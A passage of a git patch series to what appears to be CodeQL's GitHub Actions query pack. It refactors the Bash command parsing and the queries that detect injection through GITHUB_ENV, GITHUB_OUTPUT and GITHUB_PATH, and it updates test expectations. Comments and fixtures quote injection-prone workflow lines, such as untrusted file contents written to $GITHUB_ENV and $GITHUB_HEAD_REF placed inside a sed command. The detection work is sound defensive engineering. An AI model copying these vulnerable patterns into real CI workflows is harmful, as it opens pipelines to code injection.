.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", ""), - // `...` command substitution - stmt_ - .regexpFind("\\`[^\\`]+\\`", _, _) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", ""), - // original line with no substitutions - stmt_ - .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") - .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") - ] and - // We shoulg replace quoted arguments with a placeholder to avoid splitting them - // eg: ls | grep -E "*.(tar.gz|zip)$" - //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | ( - stmt.regexpMatch(".*\"([^\"]+)\".*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), - stmt.regexpFind("\"([^\"]+)\"", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value or - stmt.regexpMatch(".*'([^']+)'.*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), - stmt.regexpFind("'([^']+)'", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value or - not stmt.regexpMatch(".*'([^']+)'.*") and - not stmt.regexpMatch(".*\"([^\"]+)\".*") and - subline2 = stmt + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value ) and - cmd = subline2.splitAt(splitSeparators()).trim() and - // when splitting the line with a separator that is not found, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not cmd.indexOf(splitSeparators()) > -1 and - not cmd = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", - "case", "esac", "{", "}" - ] and - result = - cmd.replaceAll("::PIPE::", "|") - .replaceAll("::SEMICOLON::", ";") - .replaceAll("::AND::", "&&") - .replaceAll("::OR::", "||") + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) ) } - bindingset[script] - predicate getAnAssignment(string script, string name, string value) { - exists(string stmt | - stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + bindingset[script, file_var] + predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) + } + + predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) + } + + predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) + } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. + // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.matches("%" + snippet + "%") and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 ) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5b96781a10b1..30b57e361abd 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,12 +1319,6 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - string getACommand() { result = Bash::getACommand(this.getScript()) } - - predicate getAnAssignment(string name, string value) { - Bash::getAnAssignment(this.getScript(), name, value) - } - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } @@ -1344,6 +1338,194 @@ class RunImpl extends StepImpl { .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") else result = "GITHUB_WORKSPACE/" } + + private string lineProducer(int i) { + result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparators()) > -1 + } + + private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredQuotedStringLineProducer(int i) { + result = + max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + } + + private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getStmt(int i) { + result = + max(int round, string new | + this.doRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getAStmt() { result = this.getStmt(_) } + + predicate getAssignment(int i, string name, string value) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + + string getCommand(int i) { + result = this.getStmt(i) and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + string getACommand() { result = this.getCommand(_) } + + predicate getAWriteToGitHubEnv(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubPath(string value) { + Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4b8cff4f4281..f43d1bdcd878 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,20 +82,17 @@ predicate envToArgInjSink(string var_name, Run run, string command) { */ bindingset[var_name] predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string content, string value | + exists(string value | ( file = "GITHUB_ENV" and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) or file = "GITHUB_OUTPUT" and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubOutput(key, value) or file = "GITHUB_PATH" and - writeToGitHubPath(run, content) and - key = "path" and - value = content + run.getAWriteToGitHubPath(value) and + key = "path" ) and envToRunExpr(var_name, run, value) ) @@ -144,14 +141,13 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and + exists(Run run, string var_name, string key, string value | + run.getAWriteToGitHubEnv(key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - isBashParameterExpansion(value, var_name, _, _) + Bash::isBashParameterExpansion(value, var_name, _, _) ) } @@ -178,29 +174,24 @@ predicate controlledCWD(Step artifact) { * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, Step artifact, string content, string key, string value | + exists(Run run, Step artifact, string key, string value | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, Step artifact | + exists(Run run, string key, string value, Step artifact | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" - exists(string var_name, string line, string assignment_regexp, string file_read | - run.getScript().splitAt("\n") = line and - assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and - var_name = line.regexpCapture(assignment_regexp, 1) and - file_read = line.regexpCapture(assignment_regexp, 2) and - outputsPartialFileContent(file_read) and + exists(string var_name, string file_read | + run.getAnAssignment(var_name, file_read) and + Bash::outputsPartialFileContent(run, file_read) and envToRunExpr(var_name, run, value) and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) ) or // A file is read and its content is assigned to an output // - run: echo "foo=$(> "$GITHUB_ENV" - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and - outputsPartialFileContent(value) + run.getAWriteToGitHubEnv(key, value) and + Bash::outputsPartialFileContent(run, value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and artifact.getAFollowingStep() = run and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 923d950631d3..a80032de3209 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -27,19 +27,19 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_PATH - fileToGitHubPath(run, _) + Bash::fileToGitHubPath(run, _) or exists(string value | - writeToGitHubPath(run, value) and + run.getAWriteToGitHubPath(value) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 6f325ca4c939..65c6938f0a43 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -29,22 +29,21 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( // e.g. // cat test-results/.env >> $GITHUB_ENV - fileToGitHubEnv(run, _) + Bash::fileToGitHubEnv(run, _) or - exists(string content, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and + exists(string value | + run.getAWriteToGitHubEnv(_, value) and ( // e.g. // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 4a488f945b97..8541286f6e19 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -38,27 +38,25 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( // e.g. // cat test-results/.vars >> $GITHUB_OUTPUT - fileToGitHubOutput(run, _) + Bash::fileToGitHubOutput(run, _) or - exists(string content, string key, string value | - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) and + exists(string key, string value | + run.getAWriteToGitHubOutput(key, value) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and ( - outputsPartialFileContent(value) + Bash::outputsPartialFileContent(run, value) or // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT exists(string var_name, string var_value | run.getAnAssignment(var_name, var_value) and - outputsPartialFileContent(var_value) and + Bash::outputsPartialFileContent(run, var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or @@ -87,9 +85,8 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string content2, string key2 | - writeToGitHubOutput(run, content2) and - extractVariableAndValue(content2, key2, _) and + exists(string key2 | + run.getAWriteToGitHubOutput(key2, _) and not key2 = key ) and exists(run.getInScopeEnvVarExpr(var_name)) and @@ -118,7 +115,7 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { exists(Run run, string output_line, string clobbering_line, string var_name | run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and @@ -132,19 +129,16 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, string output_line, string clobbering_line | run.getScriptScalar() = this.asExpr() and run.getScript().splitAt("\n") = output_line and - singleLineWorkflowCmd(output_line, "set-output", _, _) and + Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and run.getScript().splitAt("\n") = clobbering_line and ( // A file is read and its content is assigned to an env var that gets printed to stdout // - run: | // foo=$(> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=SUBCOMMAND | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64) | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | base64 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | cat status.output.json | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | dd if=/dev/urandom bs=15 count=1 status=none | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$(cat status.output.json)" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "SUBCOMMAND" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | echo "status<<$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "$EOF" >> $GITHUB_OUTPUT | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT | @@ -132,7 +136,7 @@ | .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV" | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=SUBCOMMAND >> $GITHUB_ENV | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | @@ -159,7 +163,7 @@ | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo | | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo SUBCOMMAND | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | sh venv/bin/activate.sh | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo bar | | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo | @@ -185,15 +189,11 @@ | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "bar" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" | | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | npm i | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo SUBCOMMAND bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | npm i | | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | " config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = .* | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\" | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | awk -f ./config.awk > foo.txt | diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 100eddb14002..a87ec0a341c3 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,5 +1,3 @@ -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 80ebd80b4c2b..5880e06da7fd 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -81,7 +81,7 @@ query predicate writeToGitHubEnv1(string content) { //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and //linesFileWrite(t, _, "$GITHUB_ENV", content, _) - blockFileWrite(t, _, "$GITHUB_ENV", content, _) + Bash::blockFileWrite(t, _, "$GITHUB_ENV", content, _) //extractFileWrite(t, "GITHUB_ENV", content) ) } @@ -113,8 +113,8 @@ query predicate writeToGitHubEnv(string key, string value, string content) { "echo VAR15=$(> $GITHUB_ENV", "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractFileWrite(t, "GITHUB_ENV", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_ENV", content) and + Bash::extractVariableAndValue(content, key, value) ) } @@ -132,8 +132,8 @@ query predicate writeToGitHubOutput(string key, string value, string content) { "echo VAR8=$(> ${GITHUB_OUTPUT}", "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", ] and - extractFileWrite(t, "GITHUB_OUTPUT", content) and - extractVariableAndValue(content, key, value) + Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and + Bash::extractVariableAndValue(content, key, value) ) } @@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - isBashParameterExpansion(test, parameter, operator, params) + Bash::isBashParameterExpansion(test, parameter, operator, params) ) } From 5494f7f09953e8fa7f277528d6ac62db3019b3e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:16:37 +0200 Subject: [PATCH 565/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9637b9931187..49cb71df1b29 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.62 +version: 0.1.63 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6548292a6772..864c4949a124 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.62 +version: 0.1.63 groups: [actions, queries] suites: codeql-suites extractor: javascript From 350b354fb3f9dc179f0c8bed0efb7d527cef5eaa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:17:45 +0200 Subject: [PATCH 566/707] remmove leftover comments --- ql/lib/codeql/actions/Helper.qll | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 8391463fd202..688d62acbe17 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -202,10 +202,8 @@ module Bash { "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + - // "$(" + - trimQuotes(script.regexpCapture(regexp, 6)) + - // ")\n" + - "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + trimQuotes(script.regexpCapture(regexp, 6)) + "\n" + + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" From 0c9b808fdf91d0b06014a2abbaebf0199f836553 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:41:18 +0200 Subject: [PATCH 567/707] Make Argument Injection queries experimental --- ql/src/Security/CWE-088/ArgumentInjectionCritical.ql | 1 + ql/src/Security/CWE-088/ArgumentInjectionMedium.ql | 1 + 2 files changed, 2 insertions(+) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 2626de31935a..5962132d72e7 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-088 */ diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index fa5b750fd892..37acbc051229 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql +++ 